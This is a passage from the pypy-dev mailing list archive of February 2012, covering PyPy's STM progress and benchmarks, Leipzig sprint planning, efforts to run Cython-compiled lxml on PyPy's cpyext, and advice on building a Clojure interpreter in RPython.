I know it is about 5 hours by train (much longer than it needs to be :( ). Train tickets get rather inexpensive when booked well ahead, though they are then valid for a specific train only. Well, there is still the extra time. You can also fly from Munich. This could be cheaper than the train. To all: I think we can get some funding to cover part of the traveling and accommodation costs if your company/institution does not pay. Mike From arigo at tunes.org Fri Feb 17 21:24:25 2012 From: arigo at tunes.org (Armin Rigo) Date: Fri, 17 Feb 2012 21:24:25 +0100 Subject: [pypy-dev] Questions Re: STM status In-Reply-To: <1329506779.17932.YahooMailNeo@web120705.mail.ne1.yahoo.com> References: <1329506779.17932.YahooMailNeo@web120705.mail.ne1.yahoo.com> Message-ID: Hi Andrew, On Fri, Feb 17, 2012 at 20:26, Andrew Francis wrote: > 1) I have been looking at the transaction module and its dependent modules. > In rstm.perform_transaction, I see a comment to a "custom GIL." So the GIL > is still there? Or will it be eventually removed? That's for tests. It's protected under "if not we_are_translated()", which means that this code is never translated into the final pypy executable. > I admit I am not comfortable with reading the code. However I see places > where the code distinguishes between mutable and immutable, local and non > local variables. I will assume mutable and non-local variables will be the > subject of transactional memory. Yes, exactly. But note that distinguishing such variables only occurs in RPython, where some fields of some objects are marked as "immutable". It is important because e.g. we don't want to track the reads of the integer value out of the immutable "int" objects. I suspect that it is less important at the level of regular Python, but see below. As for the difference between "local" and "global", it's also visible at RPython level only. If a transaction allocates an object, it is "local".
If it reads from an object that existed before, it reads from a "global" object. If it writes to an object that existed before, the global object is first copied as a local object. (The global objects are immutable at this level.) When the transaction commits, we do a local GC and copy the surviving local objects to become globals; then we atomically update the global objects that have been copied and modified. This is, of course, all invisible at the level of Python. > can I assume that one can "help" the STM if a) somehow more > variables can be marked as immutable? This might later be exposed at the Python level too: you would declare some fields of a Python class as immutable; then you really couldn't change them, but the implementation could improve performance a bit. But that's a language extension, so a bit unlikely to occur. > 2)"Threads of execution" do not share state. > Essentially a more functional programming approach. Well, multiple "threads of execution" do share state, in this programming model. It allows us to not have to completely change everything in the programs we already wrote. :-) > 3) Could the stackless module work with STM? Yes: one transaction would be the time between two switch()es. It would probably just need some integration between the existing modules, 'transaction' and '_continuation'. A bientôt, Armin. From stefan_ml at behnel.de Fri Feb 17 21:40:03 2012 From: stefan_ml at behnel.de (Stefan Behnel) Date: Fri, 17 Feb 2012 21:40:03 +0100 Subject: [pypy-dev] PyPy/NumPyPy sprint(s) in Leipzig, Germany?
In-Reply-To: <4F3EB310.5090208@python-academy.de> References: <4EFF29FF.7040009@python-academy.de> <4F208672.1020501@python-academy.de> <4F21253F.3020506@gmail.com> <4F22890B.1090906@python-academy.de> <4F2291B9.4070809@python-academy.de> <4F3BC2A4.4000105@python-academy.de> <4F3BEAFB.9000406@gmail.com> <4F3D700D.5010009@python-academy.de> <4F3D90DD.2010804@gmail.com> <4F3EB310.5090208@python-academy.de> Message-ID: Mike Müller, 17.02.2012 21:05: > On 17.02.12 20:26, Maciej Fijalkowski wrote: >> On Fri, Feb 17, 2012 at 9:16 PM, Stefan Behnel wrote: >>> Just a note that I'll be in Leipzig up to the 15th of June anyway (giving a >>> Cython course). I don't know if the week after that suits *anyone* >>> (including Mike), but if you could move the sprint another week earlier, >>> I'd arrange to stay for the week-end (16/17th) and we could discuss >>> Cython/PyPy integration topics there. > > This week is still available. > >> I'm afraid I can't make it that early :( Since my home base is cape >> town travelling back and forth for 10 days just does not make any >> sense. >> >> 22-27 (being all full sprint days right? we usually do 3 + 1 + 3 >> including weekends) sounds very good to me. > > I think the one with the longest traveling distance should get the highest > priority, which puts 22-27 into the pole position. Agreed. > Stefan: How about coming to Leipzig again? I know it is about 5 hours > by train (much longer than it needs to be :( ). Train tickets get rather > inexpensive when booked well ahead and valid for a specific train only. > Well, there is still the extra time. Yes, 5:30 hours for a direct connection is exceedingly long for that distance - Hamburg is about the same time. But if there is serious interest, I'll see if I can make it for the Friday.
Stefan From cdash004 at odu.edu Sat Feb 18 03:51:51 2012 From: cdash004 at odu.edu (Chris Dashiell) Date: Fri, 17 Feb 2012 21:51:51 -0500 Subject: [pypy-dev] STM status In-Reply-To: References: Message-ID: Hi, I just wanted to let you know the numbers I got on a 32-core server. 1 thread: 3280 ms 4 threads: 2665 ms 8 threads: 2976 ms 16 threads: 2878 ms 32 threads: 2714 ms Chris On Thu, Feb 16, 2012 at 3:58 PM, Armin Rigo wrote: > Hi all, > > An update for STM: today I managed to build a pypy using the new "stm > gc". It runs richards.py on tannit: > > in 1 thread: 2320 ms per iteration > in 2 threads: 1410 ms per iteration > in 4 threads: 785 ms per iteration > in 8 threads: 685 ms per iteration > > The small gap between 4 and 8 threads is due to tannit having only 4 > "real" cpus, each one hyperthreaded. The additional gain is thus > smaller than expected. > > For comparison, a "pypy --jit off" runs at 650ms per iteration. So > the single-threaded performance is already at only 3.6x worse, and > moreover there are still a few easy big-win optimizations. I will > confirm it in a few days, but I would say that this shows it's working > quite well. :-) > > At least, it's fun to see in "top" a single pypy process using 397% cpu :-) > > For people interested, it is in the "stm-gc" branch; at least > bba9b03f5e70 works. Linux-only for now: " translate.py -O1 --stm > targetpypystandalone --no-allworkingmodules --withmod-transaction > --withmod-select --withmod-_socket ". The modified version of > richards.py I use is in pypy/translator/stm/test/. > > > A bientôt, > > Armin.
> _______________________________________________ > pypy-dev mailing list > pypy-dev at python.org > http://mail.python.org/mailman/listinfo/pypy-dev > > -------------- next part -------------- An HTML attachment was scrubbed... URL: From stefan_ml at behnel.de Sat Feb 18 09:48:05 2012 From: stefan_ml at behnel.de (Stefan Behnel) Date: Sat, 18 Feb 2012 09:48:05 +0100 Subject: [pypy-dev] Bringing Cython and PyPy closer together In-Reply-To: References: Message-ID: Stefan Behnel, 15.02.2012 12:32: > The current state of the discussion seems to be that PyPy provides ways to > talk to C code, but nothing as complete as CPython's C-API in the sense > that it allows efficient two-way communication between C code and Python > objects. Thus, we need to either improve this or look for alternatives. > > In order to get us more focussed on what can be done and what the > implications are, so that we may eventually be able to decide what should > be done, I started a Wiki page for a PyPy backend CEP (Cython Enhancement > Proposal). > > http://wiki.cython.org/enhancements/pypy The discussion so far makes me rather certain that the most promising short-term solution is to make Cython generate C code that PyPy's cpyext can handle. This should get us a rather broad set of running code somewhat quickly, while requiring the least design-from-scratch type of work in a direction that does not yet allow us to see if it will really make existing code work or not.
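Where code has to behave differently under PyPy's cpyext than under CPython's C-API, the usual way to detect the interpreter from Python is a check like the following (a sketch; the names IS_PYPY and cpython_only are illustrative, not part of Cython's actual machinery):

```python
import platform
import sys

# Both checks are standard idioms for detecting PyPy at runtime.
IS_PYPY = (platform.python_implementation() == "PyPy"
           or hasattr(sys, "pypy_version_info"))

def cpython_only(test_func):
    """Illustrative decorator: skip tests that rely on CPython
    implementation details (e.g. exact refcounts) when run on PyPy."""
    def wrapper(*args, **kwargs):
        if IS_PYPY:
            return None  # a real suite would raise unittest.SkipTest
        return test_func(*args, **kwargs)
    return wrapper
```

The same split can be made at the C level with a preprocessor guard, since cpyext's headers identify themselves as PyPy.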
On top of the basic cpyext interface, it should then be easy to implement obvious optimisations like native C level calls to Cython wrapped functions from PyPy (and potentially also the other direction) and otherwise avoid boxing/unboxing where unnecessary, e.g. for builtins. After all, it all boils down to native code at some point and I'm sure there are various ways to exploit that. Also, going this route will help both projects to get to know each other better. I think that's a required basis if we really aim for designing a more high-level interface at some point. The first steps I see are: - get Cython's test suite to run on PyPy - analyse the failing tests and decide how to fix them - adapt the Cython generated C code accordingly, special casing for PyPy where required Here is a "getting started" guide that tells you how testing works in Cython: http://wiki.cython.org/HackerGuide Once we have the test suite runnable, we can set up a PyPy instance on our CI server to get feed-back on any advances. https://sage.math.washington.edu:8091/hudson/ So, any volunteers or otherwise interested parties to help in getting this to work? Anyone in for financial support? Stefan From amauryfa at gmail.com Sat Feb 18 10:08:12 2012 From: amauryfa at gmail.com (Amaury Forgeot d'Arc) Date: Sat, 18 Feb 2012 10:08:12 +0100 Subject: [pypy-dev] Bringing Cython and PyPy closer together In-Reply-To: References: Message-ID: Hi, 2012/2/18 Stefan Behnel > Stefan Behnel, 15.02.2012 12:32: > > The current state of the discussion seems to be that PyPy provides ways > to > > talk to C code, but nothing as complete as CPython's C-API in the sense > > that it allows efficient two-way communication between C code and Python > > objects. Thus, we need to either improve this or look for alternatives. 
> > > > In order to get us more focussed on what can be done and what the > > implications are, so that we may eventually be able to decide what should > > be done, I started a Wiki page for a PyPy backend CEP (Cython Enhancement > > Proposal). > > > > http://wiki.cython.org/enhancements/pypy > > The discussion so far makes me rather certain that the most promising > short-term solution is to make Cython generate C code that PyPy's cpyext > can handle. This should get us a rather broad set of running code somewhat > quickly, while requiring the least design-from-scratch type of work in a > direction that does not yet allow us to see if it will really make existing > code work or not. > > On top of the basic cpyext interface, it should then be easy to implement > obvious optimisations like native C level calls to Cython wrapped functions > from PyPy (and potentially also the other direction) and otherwise avoid > boxing/unboxing where unnecessary, e.g. for builtins. After all, it all > boils down to native code at some point and I'm sure there are various ways > to exploit that. > > Also, going this route will help both projects to get to know each other > better. I think that's a required basis if we really aim for designing a > more high-level interface at some point. > > The first steps I see are: > > - get Cython's test suite to run on PyPy > - analyse the failing tests and decide how to fix them > - adapt the Cython generated C code accordingly, special casing for PyPy > where required > > Here is a "getting started" guide that tells you how testing works in > Cython: > > http://wiki.cython.org/HackerGuide > > Once we have the test suite runnable, we can set up a PyPy instance on our > CI server to get feed-back on any advances. > > https://sage.math.washington.edu:8091/hudson/ > > So, any volunteers or otherwise interested parties to help in getting this > to work? Anyone in for financial support? Actually I spent several evenings on this. 
I made some modifications to pypy, cython and lxml, and now I can compile and install cython, lxml, and they seem to work! For example:: html = etree.Element("html") body = etree.SubElement(html, "body") body.text = "TEXT" br = etree.SubElement(body, "br") br.tail = "TAIL" html.xpath("//text()") Here are the changes I made, some parts are really hacks and should be polished: lxml: http://paste.pocoo.org/show/552903/ cython: http://paste.pocoo.org/show/552904/ pypy changes are already submitted. As expected, the example above is much slower on pypy, about 15x slower than with cpython2.6. And I still get crashes when running the lxml test suite. But the situation looks much better than before, support of all lxml features seems possible. Cheers, -- Amaury Forgeot d'Arc -------------- next part -------------- An HTML attachment was scrubbed... URL: From stefan_ml at behnel.de Sat Feb 18 10:27:51 2012 From: stefan_ml at behnel.de (Stefan Behnel) Date: Sat, 18 Feb 2012 10:27:51 +0100 Subject: [pypy-dev] Bringing Cython and PyPy closer together In-Reply-To: References: Message-ID: Amaury Forgeot d'Arc, 18.02.2012 10:08: > 2012/2/18 Stefan Behnel >> Stefan Behnel, 15.02.2012 12:32: >>> http://wiki.cython.org/enhancements/pypy >> >> So, any volunteers or otherwise interested parties to help in getting this >> to work? Anyone in for financial support? > > Actually I spent several evenings on this. > I made some modifications to pypy, cython and lxml, > and now I can compile and install cython, lxml, and they seem to work! > > For example:: > html = etree.Element("html") > body = etree.SubElement(html, "body") > body.text = "TEXT" > br = etree.SubElement(body, "br") > br.tail = "TAIL" > html.xpath("//text()") > > Here are the changes I made, some parts are really hacks and should be > polished: > lxml: http://paste.pocoo.org/show/552903/ > cython: http://paste.pocoo.org/show/552904/ > pypy changes are already submitted. Cool. 
Most of the changes look reasonable at first glance. I'll see what I can apply on my side. We may get at least some of this into Cython 0.16 (which is close to release). > As expected, the example above is much slower on pypy, about 15x slower > than with cpython2.6. Given that XML processing is currently slower in PyPy than in CPython, I don't think that's all that bad. Users can still switch their imports to ElementTree if they only want to push XML out and I imagine that lxml would still be at least as fast as ElementTree under PyPy for the way in. > And I still get crashes when running the lxml test suite. I can imagine. ;) > But the situation looks much better than before, support of all lxml > features seems possible. I think that's what matters to most users who want to do XML processing in PyPy. Stefan From fijall at gmail.com Sat Feb 18 10:35:24 2012 From: fijall at gmail.com (Maciej Fijalkowski) Date: Sat, 18 Feb 2012 11:35:24 +0200 Subject: [pypy-dev] Bringing Cython and PyPy closer together In-Reply-To: References: Message-ID: On Sat, Feb 18, 2012 at 11:27 AM, Stefan Behnel wrote: > Amaury Forgeot d'Arc, 18.02.2012 10:08: >> 2012/2/18 Stefan Behnel >>> Stefan Behnel, 15.02.2012 12:32: >>>> http://wiki.cython.org/enhancements/pypy >>> >>> So, any volunteers or otherwise interested parties to help in getting this >>> to work? Anyone in for financial support? >> >> Actually I spent several evenings on this. >> I made some modifications to pypy, cython and lxml, >> and now I can compile and install cython, lxml, and they seem to work! >> >> For example:: >>     html = etree.Element("html") >>     body = etree.SubElement(html, "body") >>     body.text = "TEXT" >>     br = etree.SubElement(body, "br") >>     br.tail = "TAIL" >>    
html.xpath("//text()") >> >> Here are the changes I made, some parts are really hacks and should be >> polished: >> lxml: http://paste.pocoo.org/show/552903/ >> cython: http://paste.pocoo.org/show/552904/ >> pypy changes are already submitted. > > Cool. Most of the changes look reasonable at first glance. I'll see what I > can apply on my side. We may get at least some of this into Cython 0.16 > (which is close to release). > > >> As expected, the example above is much slower on pypy, about 15x slower >> than with cpython2.6. > > Given that XML processing is currently slower in PyPy than in CPython, I > don't think that's all that bad. Users can still switch their imports to > ElementTree if they only want to push XML out and I imagine that lxml would > still be at least as fast as ElementTree under PyPy for the way in. > Are you sure actually? From stefan_ml at behnel.de Sat Feb 18 10:48:26 2012 From: stefan_ml at behnel.de (Stefan Behnel) Date: Sat, 18 Feb 2012 10:48:26 +0100 Subject: [pypy-dev] Bringing Cython and PyPy closer together In-Reply-To: References: Message-ID: Maciej Fijalkowski, 18.02.2012 10:35: > On Sat, Feb 18, 2012 at 11:27 AM, Stefan Behnel wrote: >> Given that XML processing is currently slower in PyPy than in CPython, I >> don't think that's all that bad. Users can still switch their imports to >> ElementTree if they only want to push XML out and I imagine that lxml would >> still be at least as fast as ElementTree under PyPy for the way in. > > Are you sure actually? I'm sure it's currently much slower, see here: http://blog.behnel.de/index.php?p=210 I'm not sure the quickly patched lxml is as fast in PyPy as it is in CPython, but there is certainly room for improvements, as I mentioned before. A substantial part of it runs in properly hand tuned C, after all, and thus doesn't need to go through cpyext or otherwise talk to PyPy. 
Stefan From fijall at gmail.com Sat Feb 18 10:56:40 2012 From: fijall at gmail.com (Maciej Fijalkowski) Date: Sat, 18 Feb 2012 11:56:40 +0200 Subject: [pypy-dev] Bringing Cython and PyPy closer together In-Reply-To: References: Message-ID: On Sat, Feb 18, 2012 at 11:48 AM, Stefan Behnel wrote: > Maciej Fijalkowski, 18.02.2012 10:35: >> On Sat, Feb 18, 2012 at 11:27 AM, Stefan Behnel wrote: >>> Given that XML processing is currently slower in PyPy than in CPython, I >>> don't think that's all that bad. Users can still switch their imports to >>> ElementTree if they only want to push XML out and I imagine that lxml would >>> still be at least as fast as ElementTree under PyPy for the way in. >> >> Are you sure actually? > > I'm sure it's currently much slower, see here: > > http://blog.behnel.de/index.php?p=210 > > I'm not sure the quickly patched lxml is as fast in PyPy as it is in > CPython, but there is certainly room for improvements, as I mentioned > before. A substantial part of it runs in properly hand tuned C, after all, > and thus doesn't need to go through cpyext or otherwise talk to PyPy. > > Stefan > > _______________________________________________ > pypy-dev mailing list > pypy-dev at python.org > http://mail.python.org/mailman/listinfo/pypy-dev Can you please send me or post the numbers somewhere? I'm fairly bad at trying to deduce them from the graph (although that doesn't change that the graph is very likely more readable). I'm not sure there are easy ways to optimize. Sure cpyext is slower than ctypes, but we cannot achieve much more than that. Certainly we cannot do unboxing (boxes might only be produced to make cpyext happy, for example). Unless I'm misunderstanding your intentions, can you elaborate? I somehow doubt it's possible to make this run fast using cpyext (although there are definitely some ways). Maybe speeding up ElementTree would be the way to go if all we want is a fast XML processor? I doubt this is the case though.
I'm waiting for other insights, I'm a bit clueless. Cheers, fijal From stefan_ml at behnel.de Sat Feb 18 11:20:16 2012 From: stefan_ml at behnel.de (Stefan Behnel) Date: Sat, 18 Feb 2012 11:20:16 +0100 Subject: [pypy-dev] Bringing Cython and PyPy closer together In-Reply-To: References: Message-ID: Amaury Forgeot d'Arc, 18.02.2012 10:08: > I made some modifications to pypy, cython and lxml, > and now I can compile and install cython, lxml, and they seem to work! > > For example:: > html = etree.Element("html") > body = etree.SubElement(html, "body") > body.text = "TEXT" > br = etree.SubElement(body, "br") > br.tail = "TAIL" > html.xpath("//text()") > > Here are the changes I made, some parts are really hacks and should be > polished: > lxml: http://paste.pocoo.org/show/552903/ The weakref changes are really unfortunate as they appear in one of the most performance critical spots of lxml's API: on-the-fly proxy creation. I can understand why the original code won't work as is, but could you elaborate on why the weak references are needed? Maybe there is a faster way of doing this? Stefan From arigo at tunes.org Sat Feb 18 11:46:09 2012 From: arigo at tunes.org (Armin Rigo) Date: Sat, 18 Feb 2012 11:46:09 +0100 Subject: [pypy-dev] STM status In-Reply-To: References: Message-ID: Hi Chris, On Sat, Feb 18, 2012 at 03:51, Chris Dashiell wrote: > I just wanted to let you know the numbers I got on a 32 core server. > > 1 thread: 3280 ms > 4 threads: 2665 ms > 8 threads: 2976 ms > 16 threads: 2878 ms > 32 threads: 2714 ms We just checked on a 24-core server (2 physical processors of 6x2 cores each). We also get strange results, notably: the 1-thread performance is often *better* than the 2-threads performance. We tried to use "taskset" to constrain which cores run the two threads, trying notably to keep them on the same physical processor in order to minimize inter-processor traffic, but the resulting performance numbers make no sense at all. 
For example with "taskset -c 0,2,3" it is much faster than with any 2-numbers-only combination of 0, 2 and 3, which makes no sense because it's only running 2 threads... Armin From stefan_ml at behnel.de Sat Feb 18 12:23:26 2012 From: stefan_ml at behnel.de (Stefan Behnel) Date: Sat, 18 Feb 2012 12:23:26 +0100 Subject: [pypy-dev] Bringing Cython and PyPy closer together In-Reply-To: References: Message-ID: Maciej Fijalkowski, 18.02.2012 10:56: > On Sat, Feb 18, 2012 at 11:48 AM, Stefan Behnel wrote: >> Maciej Fijalkowski, 18.02.2012 10:35: >>> On Sat, Feb 18, 2012 at 11:27 AM, Stefan Behnel wrote: >>>> Given that XML processing is currently slower in PyPy than in CPython, I >>>> don't think that's all that bad. Users can still switch their imports to >>>> ElementTree if they only want to push XML out and I imagine that lxml would >>>> still be at least as fast as ElementTree under PyPy for the way in. >>> >>> Are you sure actually? >> >> I'm sure it's currently much slower, see here: >> >> http://blog.behnel.de/index.php?p=210 >> >> I'm not sure the quickly patched lxml is as fast in PyPy as it is in >> CPython, but there is certainly room for improvements, as I mentioned >> before. A substantial part of it runs in properly hand tuned C, after all, >> and thus doesn't need to go through cpyext or otherwise talk to PyPy. > > Can you please send me or post somewhere numbers? I'm fairly bad at > trying to deduce them from the graph (although that doesn't change > that the graph is very likely more readable). You can get the code and the input files from here: http://lxml.de/etbench.tar.bz2 Note that this only compares the parser performance, but given how much faster CPython is here (we are talking seconds!), it'll be hard enough for PyPy to catch up with anything after such a head start. > I'm not sure there are easy ways to optimize. Sure cpyext is slower > than ctypes, but we cannot achieve much more than that. 
Certainly we > cannot do unboxing (boxes might be only produced to make cpyext happy > for example). Unless I'm misunderstanding your intentions, can you > elaborate? If you are referring to my comments on a faster interconnection towards Cython, I think it should be quite easy for PyPy to bypass Cython's Python function wrapper implementation (of type "CyFunction") to call directly into the underlying C function, with unboxed parameters. Cython could provide some sort of C signature introspection feature that PyPy could analyse and optimise for. But that's only that direction. Calling from Cython code back into PyPy compiled code efficiently is (from what I've heard so far) likely going to be trickier because Cython would have to know how to do that at C compilation time at the latest, while PyPy decides about these things at runtime. Still, there could be a way for Cython to tell PyPy about the signature it wants to use for a specific unboxed call, and PyPy could generate an optimised wrapper for that and eventually a specialised function implementation for the statically known set of argument types in a specific call. A simple varargs approach may work here, imagine something like this:

    error = PyPy_CallFunctionWithSignature(
        func_obj_ptr, "(int, object, list, option=bint) -> int",
        i, object_ptr, list_obj_ptr, 0, int_result*)

And given that the constant signature string would be interned by the C compiler, a simple pointer comparison should suffice for branching inside of PyPy. That would in many cases drop the need to convert all parameters to objects and to pack them into an argument tuple. Even keyword arguments could often be folded into positional varargs, as I indicated above. I can well imagine that PyPy could render such a calling convention quite efficient. > I somehow doubt it's possible to make this run fast using cpyext > (although there are definitely some ways).
Maybe speeding up > ElementTree would be the way if all we want to get is a fast XML > processor? I doubt this is the case though. cElementTree, being younger, may contain a couple of optimisations that ElementTree lacks, but I doubt that there is still so much to get out of it. ET has already received quite a bit of tuning in the past (although not for PyPy). The main problem seems to be that the SAX driven callbacks from the expat parser inject too much overhead. And any decently sized XML document will trigger a lot of those. Stefan From arigo at tunes.org Sat Feb 18 12:54:44 2012 From: arigo at tunes.org (Armin Rigo) Date: Sat, 18 Feb 2012 12:54:44 +0100 Subject: [pypy-dev] Poor performance with custom bytecode In-Reply-To: References: <4F3E5396.70705@gmail.com> <4F3E561D.2080307@gmail.com> Message-ID: Hi Antoni, On Fri, Feb 17, 2012 at 18:49, Antoni Segura Puimedon wrote: > Any suggestion on where to start reading pypy code/material? In your case, I'd suggest that you should first write a Clojure interpreter in regular Python, and then worry about making it RPython. This is done mostly by following the guidelines in http://doc.pypy.org/en/latest/coding-guide.html . Note also that, from what I've understood, it might be useful to integrate the Clojure interpreter with PyPy to allow calls to the rest of the Python standard library and built-in modules. This is relatively easy to do, and doesn't prevent the JIT from JITting the clojure interpreter. (You can have multiple JITs in the same process.) I imagine it would be done as a PyPy built-in module, which can be called from Python code in order to compile and execute Clojure code. To do this you would need to follow the general structure shown for example in pypy/module/_demo/. This is explained in http://doc.pypy.org/en/latest/coding-guide.html#mixed-modules . A bientôt, Armin.
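[Editor's note: a minimal sketch of the "regular Python first" approach Armin suggests — a toy stack-machine interpreter written in the RPython-friendly subset of Python. The opcode names and program format are invented purely for illustration and are not from the thread or from PyPy itself.]

```python
# Toy stack-machine interpreter in the RPython-friendly subset of Python
# (static-looking code, no dynamic typing tricks). A real interpreter
# intended for translation would add JIT hints (jit_merge_point etc.),
# omitted here so the sketch runs under plain CPython.
def interpret(program, arg):
    stack = []
    pc = 0
    while pc < len(program):
        op = program[pc]
        if op[0] == "push":      # push a constant operand
            stack.append(op[1])
        elif op[0] == "arg":     # push the input argument
            stack.append(arg)
        elif op[0] == "add":     # pop two values, push their sum
            b = stack.pop()
            a = stack.pop()
            stack.append(a + b)
        pc += 1
    return stack[-1]

print(interpret([("arg",), ("push", 2), ("add",)], 40))  # prints 42
```

Once such a loop works in plain Python, making it RPython is mostly a matter of keeping the types consistent, as the coding guide describes.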
From celebdor at gmail.com Sat Feb 18 13:02:16 2012 From: celebdor at gmail.com (Antoni Segura Puimedon) Date: Sat, 18 Feb 2012 13:02:16 +0100 Subject: [pypy-dev] Poor performance with custom bytecode In-Reply-To: References: <4F3E5396.70705@gmail.com> <4F3E561D.2080307@gmail.com> Message-ID: Hi Armin, On Sat, Feb 18, 2012 at 12:54 PM, Armin Rigo wrote: > Hi Antoni, > > On Fri, Feb 17, 2012 at 18:49, Antoni Segura Puimedon > wrote: > > Any suggestion on where to start reading pypy code/material? > > In your case, I'd suggest that you should first write a Clojure > interpreter in regular Python, and then worry about making it RPython. > This is done mostly by following the guidelines in > http://doc.pypy.org/en/latest/coding-guide.html . > Thanks a lot for the advice. I will do that then, start from the basics. > > Note also that, from what I've understood, it might be useful to > integrate the Clojure interpreter with PyPy to allow calls to the rest > of the Python standard library and built-in modules. This is > relatively easy to do, and doesn't prevent the JIT from JITting the > clojure interpreter. (You can have multiple JITs in the same > process.) I imagine it would be done as a PyPy built-in module, which > can be called from Python code in order to compile and execute Clojure > code. > To do this you would need to follow the general structure shown for > example in pypy/module/_demo/. This is explained in > http://doc.pypy.org/en/latest/coding-guide.html#mixed-modules . > I will read it, but I expect to have a lot of questions about the integration :P > > > A bientôt, > > Armin. > Best regards, Antoni Segura Puimedon -------------- next part -------------- An HTML attachment was scrubbed...
URL: From stefan_ml at behnel.de Sat Feb 18 13:04:26 2012 From: stefan_ml at behnel.de (Stefan Behnel) Date: Sat, 18 Feb 2012 13:04:26 +0100 Subject: [pypy-dev] Bringing Cython and PyPy closer together In-Reply-To: References: Message-ID: Maciej Fijalkowski, 18.02.2012 10:56: > On Sat, Feb 18, 2012 at 11:48 AM, Stefan Behnel wrote: >> Maciej Fijalkowski, 18.02.2012 10:35: >>> On Sat, Feb 18, 2012 at 11:27 AM, Stefan Behnel wrote: >>>> Given that XML processing is currently slower in PyPy than in CPython, I >>>> don't think that's all that bad. Users can still switch their imports to >>>> ElementTree if they only want to push XML out and I imagine that lxml would >>>> still be at least as fast as ElementTree under PyPy for the way in. >>> >>> Are you sure actually? >> >> I'm sure it's currently much slower, see here: >> >> http://blog.behnel.de/index.php?p=210 > > Can you please send me or post somewhere numbers? I'm fairly bad at > trying to deduce them from the graph (although that doesn't change > that the graph is very likely more readable). I just noticed that I still had them lying around, so I'm pasting them here as a tabified table. Columns: 274KB hamlet.xml, 3.4MB ot.xml, 25MB Slavic text, 4.5MB structure, 6.2MB structure PP

MiniDOM (PyPy)       0,091   0,369   2,441   1,363   3,152
MiniDOM              0,152   0,672   6,193   5,935   8,705
lxml.etree           0,014   0,041   0,454   0,131   0,199
ElementTree (PyPy)   0,045   0,293   2,282   1,005   2,247
ElementTree          0,104   0,385   3,274   3,374   4,178
cElementTree         0,022   0,056   0,459   0,192   0,478

This was using PyPy 1.7, times are in seconds. As you can see, CPython is faster by a factor of 5-10 for the larger files.
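[Editor's note: a quick sanity check of the "factor of 5-10" figure against the table, pairing the PyPy ElementTree times with CPython's lxml.etree times for the three larger files. The pairing of rows is my reading of the table, and the decimal commas are converted to points.]

```python
# Times in seconds, taken from the table above (25MB Slavic text,
# 4.5MB structure, 6.2MB structure PP).
pypy_elementtree = {"slavic": 2.282, "structure": 1.005, "structure_pp": 2.247}
cpython_lxml = {"slavic": 0.454, "structure": 0.131, "structure_pp": 0.199}

# Ratio of PyPy ElementTree time to CPython lxml.etree time per file.
ratios = {name: pypy_elementtree[name] / cpython_lxml[name]
          for name in pypy_elementtree}
for name in sorted(ratios):
    print("%s: CPython is %.1fx faster" % (name, ratios[name]))
```

The ratios come out at roughly 5x to 11x, consistent with the rough "5-10" summary in the mail.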
Stefan From stefan_ml at behnel.de Sat Feb 18 13:38:56 2012 From: stefan_ml at behnel.de (Stefan Behnel) Date: Sat, 18 Feb 2012 13:38:56 +0100 Subject: [pypy-dev] Bringing Cython and PyPy closer together In-Reply-To: References: Message-ID: Amaury Forgeot d'Arc, 18.02.2012 10:08: > I made some modifications to pypy, cython and lxml, > and now I can compile and install cython, lxml, and they seem to work! > > For example:: > html = etree.Element("html") > body = etree.SubElement(html, "body") > body.text = "TEXT" > br = etree.SubElement(body, "br") > br.tail = "TAIL" > html.xpath("//text()") > > Here are the changes I made, some parts are really hacks and should be > polished: > lxml: http://paste.pocoo.org/show/552903/ I attached a reworked but untested patch for lxml. Could you try it? I couldn't find the PyWeakref_LockObject() function anywhere. That's a PyPy-only thing, right? I aliased it to (NULL) when compiling for CPython. I'll go through the Cython changes next, so I haven't got a working Cython version yet. Stefan -------------- next part -------------- A non-text attachment was scrubbed... Name: pypy-support.patch Type: text/x-patch Size: 4020 bytes Desc: not available URL: From faassen at startifact.com Sat Feb 18 14:11:53 2012 From: faassen at startifact.com (Martijn Faassen) Date: Sat, 18 Feb 2012 14:11:53 +0100 Subject: [pypy-dev] Bringing Cython and PyPy closer together In-Reply-To: References: Message-ID: Hi there, On Sat, Feb 18, 2012 at 10:56 AM, Maciej Fijalkowski wrote: > I somehow doubt it's possible to make this run fast using cpyext > (although there are definitely some ways). Maybe speeding up > ElementTree would be the way if all we want to get is a fast XML > processor? I doubt this is the case though. lxml does a heck of a lot more than ElementTree. If all you need is a fast parser and serializer I figure you could wrap cElementTree using rpython or something like that. But lxml does a lot of other things. 
For some insight into why people would want lxml, there's an interesting discussion on google app engine's bug tracker about it. http://code.google.com/p/googleappengine/issues/detail?id=18 This type of discussion is instructive as PyPy's barriers to porting C extensions, while not "just wait for google" as the google app engine case, are still somewhat similar. In the end google finally ended up supporting numpy, lxml and a few other modules. Regards, Martijn From stefan_ml at behnel.de Sat Feb 18 14:28:40 2012 From: stefan_ml at behnel.de (Stefan Behnel) Date: Sat, 18 Feb 2012 14:28:40 +0100 Subject: [pypy-dev] Bringing Cython and PyPy closer together In-Reply-To: References: Message-ID: Martijn Faassen, 18.02.2012 14:11: > For some insight into why people would want lxml, there's an interesting > discussion on google app engine's bug tracker about it. > > http://code.google.com/p/googleappengine/issues/detail?id=18 > > This type of discussion is instructive as PyPy's barriers to porting C > extensions, while not "just wait for google" as the google app engine > case, are still somewhat similar. In the end google finally ended up > supporting numpy, lxml and a few other modules. Whoopsa! I totally wasn't aware that they actually did something about that seriously long-standing feature request. That's cool. Stefan From stefan_ml at behnel.de Sat Feb 18 14:36:45 2012 From: stefan_ml at behnel.de (Stefan Behnel) Date: Sat, 18 Feb 2012 14:36:45 +0100 Subject: [pypy-dev] Bringing Cython and PyPy closer together In-Reply-To: References: Message-ID: Amaury Forgeot d'Arc, 18.02.2012 10:08: > 2012/2/18 Stefan Behnel > I made some modifications to pypy, cython and lxml, > and now I can compile and install cython, lxml, and they seem to work!
